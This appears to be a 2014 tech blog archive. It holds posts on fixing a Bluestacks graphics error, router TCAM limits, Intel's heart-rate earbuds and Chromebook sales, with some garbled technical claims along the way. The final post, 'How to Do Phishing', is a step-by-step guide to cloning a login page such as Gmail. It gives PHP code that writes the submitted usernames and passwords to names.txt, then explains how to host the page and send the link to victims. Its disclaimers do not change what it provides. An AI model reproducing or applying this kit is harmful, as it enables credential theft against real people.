Wednesday, August 20, 2014

How to Resolve Bluestacks Graphics Driver Issues

Bluestacks is an amazing software that allows to run android games and apps on computers. Playing android games on big computer screen is so much fun and only gamers addict will understand this. But the system requirement is very high for Bluestacks. It needs a good and updated graphic card along with 2 GB RAM. And if these requirements are fulfilled then android apps and games will run smoothly but many people face problem in installing Bluestacks due to some errors.

The main error that is observed in most of the system is: “Bluestacks graphic card error 25000” or there may be some more but this is the common error faced. The message displayed in this error is something like this: “ Error 25000: Bluestacks currently doesn’t recognize your graphic card. There is a possibility that your graphics drivers may need to be updated. Please update them and try to reinstall.

So today in this post we will see how to resolve Bluestacks graphics driver error. We will first see what are the main reasons that lead to graphics driver error and then we will discuss some amazing tricks which you can use to successfully install Bluestacks in your PC.

What are the reasons for Bluestacks Graphic Card Error?
Since Bluestacks is very heavy software it will require a highly configured and updated system. So main reason for Bluestacks graphic card error is:

The two graphics cards in the system are Direct3D of Microsoft which is proprietary software and OpenGL which is used to run the android applications. So if you are not updating the windows operating system regularly then OpenGL will not be updated as frequently and regularly as Direct3D. So when we install and run the Bluestacks then it shows the error 25000. So not updating the system is one of the main reasons for this issue so we need to fix it.

How to resolve Bluestacks graphics driver error?
So now we are familiar with the reason for the graphics driver error so now let’s see some useful tricks that will help us to fix this error:

1. The first thing that you can try is to update your graphic card driver because this will not only help you to run the Bluestacks smoothly but also it will allow you to enjoy the latest and advanced software and games. It will be good to enable java in your web browser before updating them. The entire graphics card whether it is Intel chipset or AMD or nVIDIA can be updated easily. You can Google it and learn how to update them.

2. Also update your DirectX. May be this can also help you because in most cases it has worked successfully.

3. Since graphic card requires high power energy that is not enabled by laptop batteries so android applications may not run smoothly on PC. So always try to give a live power supply to the PC while running android apps or games. You can test it and feel the difference.

4. If these tips are not working then simply download the older version of Bluestacks and that old version will easily support your outdated system. But this will not support advanced games like temple run but it will successfully run some basic android applications like WhatsApp.

5. There are some software which will help you to bypass the graphics driver error 25000. Orca is one of them. You can learn about this more in Google.

So these are some useful tips that will help you to resolve the Bluestacks graphics driver error and even I would like to suggest you to update the graphic card driver and if you have very old then replace it because it will not only help to install Bluestacks successfully but it will also help you to run other advanced software in your system.

So always be updated with technology. In later posts we will also come with some more amazing tricks so stay connected.

Tuesday, August 19, 2014

Internet Traffic Disruptions Imminent As Routing Tables Approach Limit

Internet Traffic
Short Disruption in Internet Traffic Routing

Short disruptions in Internet traffic routing occurred recently which has been attributed to a short surge of registered IPv4 network routes that have made the total number more than the capacity of the old though popular used routers which form the backbone of the internet.Internet users all over experienced major problems on websites which was the result of flood of updates to databases within the internet routers.

This resulted in problems with connectivity issue for companies and many are of the opinion that the modification and the reboot of routers would probably head towards a decline in internet outages in the near future. Experts are of the opinion that this problem could be solved but are speculating that it could only be a precursor to widespread disruption which may come up later on.

 Some of the older kinds that are still operating, like the massive scale data centre Internet router, have hard coded limit to the Ternary Content Addressable Memory – TCAM, which are placed for storing records of internet routes that are broadcasted by various types of servers from time to time which in turn are used to send data like Web sites requests from one part of the world to the other end.

Getaways/Routers Mark Entry/Exit Points

Global traffic
Thousands of getaways which are routers mark the entry and exit points, between the internet service providers’ network and the large backbones which send data packets across the world and are governed as well as synchronised by the Border Gateway Protocol – BGP. The most practical limitation of storable routes is 524288 or 2 raised to the power of 19 in binary or 512,000 which crossed its limitation on Tuesday resulting in congestion as well as blockage of routes. BGP ended in being unable to identify routes which were the cause in the packet loss.

It is essential to have frequent updates to routers in order to explain how networks should operates since internet traffic is designed to move in the most systematic manner, with 512 ports to table data on the internet. Moreover, the frequency of updates to routers is derived from the fact that some of the routers have the potential of accommodating around 512,000 updates in memory excluding any further tweaks. With some of the routers reaching their limits, it seems that the internet has been reaching its full capacity, resulting in a few networks going offline.

Fix Router Memory Allocation Issue

The number of routes has been increasing and stakeholders are gearing to fix the router memory allocation issue but are unprepared for the sudden surge in route records. This issue has been given to BGPMon to rectify the error in Verizon’s system which has been fixed and traffic has now returned to normal.

In May however, Cisco had provided information on how to re-allocate TCAM on Catalyst 6500 as well as 7600 to 1,000,000 and this fix was comparatively simple to apply though it would need each router to be taken offline momentarily. Increasing the capacity should enhance the problem for a longer period of time and is not a permanent fix. As per packet, the milestone of 300,000 routes, indicting a rapid increase in growth was passed in August 2009.

Intel Inside Your Headphones

Intel is the best company known for developing high class processors and certain electronic chips that are used in 90% of laptops and other electronic gadgets. Intel has always tried to develop something different. The i-core processors are the best examples. So Intel has always created interesting stuffs and now it is developing the ear buds that are used in the earphones or headsets. So these ear buds are not same as before but it’s really different as it will detect the user’s heart rates. This news was announced on Friday that Intel is collaborating with rapper Curtis "50 Cent" Jackson's SMS Audio to create and develop this amazing smart ear bud that will take care of user’s health by detecting his heart rates.

The SMS Audio BioSport In-Ear Headphones will be having an earhook and this earhook will be driven or powered by the user's phone that is smart phone. The best part about this is that it will not only be water-resistantbut alsosweat-resistant. These smart ear buds will be offered by SMS Audio in Q4. The rate is not yet announced but is expected very soon.

Bill Calder who is one the representative of Intel says that it is really a unique product as compared to other earphones in the market and no batter is required to run it and that’s the biggest punch.

These BioSport earphones will be well-suited and compatible with the fitness application Run keeper for not only android smart phones but also for iPhones. And in future it will also support some other applicatons related to health and fitness. And these ear designed in such a way that it will work with any kind of smart android phones available. It is wired instead of Bluetooth because wired ear bud will not require any kind of power source for its charging.

The earbuds will have infrared optical sensors that will display the pulsing of the skin inside the user's ear. It was designed and developed in this way because it is static inside the ear so additional motion sensors are not at all required. The earbuds also have an accelerometer which will track user’s motion and that corrects for gestures and motions like for example users shaking their heads.

The data will be captured by these earbuds of the headphones and this data will be communicated to user’s smart phone that will show the analysis and processing of motions.

The final decisions have been taken regarding the product design and let’s hope that it will be in the market soon. So this is basically related to the health and people who are really serious about their health analysis then it’s a must buy for them. It’s just the beginning for Intel and they said that they can do much more with their technology and related procurements.

Gartner's Blausays that it looks like a fun device but at the same time it is also very useful product for health conscious people. He also said that the success of this product is based on branding, budgets and how well it works.

So overall Intel is really going to give the world an amazing and technology driven product that will change the lifestyle of people. So let’s hope that it will be launched soon in the market.

Monday, August 18, 2014

Google Chromebook tend to function better than Apple and Android tablets

Google Chromebook
Both Windows PCs as well as Mac have been traditionally fighting to have their dominance in the desktop landmark as seen in the business sector. On the other hand, we notice Android tablets jostling around with iPads to gain its preeminence in the market.

As these battles are on, everyone tried to overlook Chromebook, despite its persistent signs of development and growth. As per the prediction made by Gartner, it is most likely that the cloud-powered laptops will have a boosting sale of around five million units by the end of this year.

In addition, analysts also believe that with the further implementation of collaborative working practices and cloud computing techniques, in the business area, the sale of Chromebook will even rise as high to about 14 million by 2017.The director of Gartner, Ranjit Atwal states that the appeal and attraction of Chromebook to business is immense because it comes with functionality enabled with its cloud-based operating system. One of the other reasons why is it in huge demand is because it has access to apps and comes with a centralized data, which is convenient for many businesses he explained.

Even with the decline of notebooks, Chromebook came in and filled the gap, which dominated between the fluctuating demand of fully-fledged laptops and tablets: both of them have so far reduced their price and have a well-established business so far. Thus with this, V3 asked the director whether Chromebook can ever have any impact on the market of tablet and laptops.

Quocirca’s service director, Clive Longbottom, is a bit skeptical about this. He believes that has been so far working on and has been familiar with Windows laptops might have a tendency of refraining from adopting Chromebook, as one of the moves to cloud computing, despite also stating clearly that Chromebook have in fact "improved massively", since the time they have come to the market.

He stated that with Chromebook not being cheaper than a Windows 7/8 laptop, the companies that already have an existing Microsoft license agreement would most probably move in for windows laptops. However, he also stated that Chrome books might come in with a great option for companies and organizations that are new or "web-born” and would most likely gain huge advantage from collaboration which is offered from Chromebook end.

Furthermore, Chrome book’s sale might get fuelled by start-ups and other set of new businesses which require cost savings and flexibility that is delivered by cloud-based software’s and services.

The principal analyst at MWD Advisors, Craig Wentworth states that Chromebooks are being already treated as tablet plus devices since they generally have a tendency to reply on tablet plus and apps, but they offer a much more improved functionality with additional proper Qwerty keyboard. He further went on declaring that the middle ground position is not a very strong position for Chromebook to stay in. he stated that with the recent demand of touch screen, mostly present in nearly all mobile devices today, it is trying hard to fully embed it into the Chrome support system by Google.

Saturday, August 16, 2014

How to Do Phishing

Phishing simply means creating a fake page of a popular website or company and stealing personal information like username, password, credit card details, and account numbers etc. with the help of that page. Phishing is one of the simplest techniques used by the hacker to hack the account by stealing the login details. Catching a phishing is quite difficult because it has exactly same home page as the original website but yes the link or URL is different. So if you find any such web page displaying the content of the original website but having other abrupt link then you must report to the admin of the site.

Phishing is illegal to practice so please don’t do it. But yes everyone should know that how does it takes place so that they are never caught in the threats. So let us now learn that how phishing is done and how fake page is created but before we begin let me declare:

DISCLAIMER : I am not responsible for any harm caused by the user. The tutorial is purely and only for educational purposes. Please do not misuse this tutorial. 

So it’s a kind request from everyone that please don’t misuse it but try to learn it so that you are not affected by this at any instance. So let’s begin:

Firstly you need to have a hosting account. You can also create a free hosting account that is available on many websites, you can simply google it and create an account in any one of them.

Now what hackers do is that they first select the target website like gmail, facebook etc. Once selected, they create the fake page of that original website.

Creating a fake page is quite simple. Just go to any website say Gmail and then right click and select the option “view source code” and then copy all the code in the notepad and save it as target.html.
Now other step is to create a file named “code.php”. Simply open note pad and copy the following

header ('Location:');

$handle = fopen("names.txt", "a");

foreach($_POST as $variable => $value)
fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");
fwrite($handle, "\r\n");




You can replace with any website you want to direct user to.

Now after copying the following code save it as code.php and now it’s almost done.

Now go to the file target.html and open it because some editing has to be done. Now press ctrl+f and search for “action=” with login written in it. You will observe one link there so replace that link or URL with the file code.php that you have created initially. And now it’s almost done. Also create one file named names.txt where you will get the passwords of the infected user.

Now simply go your hosting account and upload the three files that are: target.html, code.php and name.txt. After they are successfully uploaded it’s ready. Now you will have a link to the fake page like: You can select domain name according to your choice. Now the fake page is ready and now you can submit this link to your friend or anyone else. If he login to this fake page then you can check his username and password in the names.txt file as all the passwords will be stored here.

So this is all about hacking through phishing. But I request you all not to misuse it because it’s illegal and a big cyber-crime. So I hope you will never become the victim of such fake pages. Simply have a look at the link then log in or first reload the page then log in to the account. So in later posts we will also cover some interesting tricks like this so stay connected.